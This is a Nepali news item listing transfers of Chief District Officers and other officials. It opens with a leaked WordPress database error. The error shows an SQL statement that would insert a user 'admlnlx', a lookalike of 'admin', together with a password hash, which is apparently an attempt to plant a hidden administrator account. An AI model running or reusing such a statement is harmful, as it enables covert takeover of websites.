WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHDTh6a/8Qm469O5OkgHYYC8m8W9ID/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:21:16', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १४ साउन, काठमाडौं । गृहमन्त्रालयले सोलुखुम्बु सहित ११ जिल्लाका सिडिओ सरुवा गरेको छ । सोमबार ११ सिडियोसहित २५ जनाको सरुवा तथा पदस्थापन गरिएको हो ।
सोलुखुम्बुमा वेधनिधि खनाल, दैलेखमा युवराज कट्टेल, तेह्रथुममा चन्द्रकला ओली, म्याग्दीमा ज्ञाननाथ ढकाल र पूर्वी रुकुममा वेधनिधि अधिकारीलाई सिडिओ बनाएर पठाइएको छ ।
त्यतै सर्लाहीका प्रमुख जिल्ला अधिकारी (सिडिओ)कृष्णबहादुर राउतलाई सुनसरी सरुवा गरिएको छ । सर्लाहीमा मोहनबहादुर जिसीलाई कामु सिडिओको जिम्मेवारी दिइएको छ ।
यसैगरी कृष्णप्रसाद पन्थ प्युठान, कृष्णचन्द्र पौडेल कालिकोट, पुष्पराज पौडेल मनाङ र डोरेन्द्र निरौला ताप्लेजुङको सिडिओ बनेका छन् ।
उपसचिव अनुज भण्डारी मोरङ, वद्रीनाथ गैरे नुवाकोट, तुल्सीराम पौडेल गोरखा, रामेश्वर अर्याल तनहुँ र लक्ष्मीदेवी हुमागाईंलाई काभ्रेको सहायक सिडिओ बनाएर पठाइएको छ ।
लक्ष्मीप्रसाद बास्कोटा केन्द्रीय कारागार सुन्धारा र शम्भुप्रसाद रेग्मी राष्ट्रिय परीचयपत्र तथा पञ्जीकरण विभागमा सरुवा भएका छन् । खुमकान्त आचार्य इलाका प्रशासन कार्यालय साँखु र चन्द्रबहादुर कार्की इलाका प्रशासन कार्यालय धरानमा सरुवा भएका छन् ।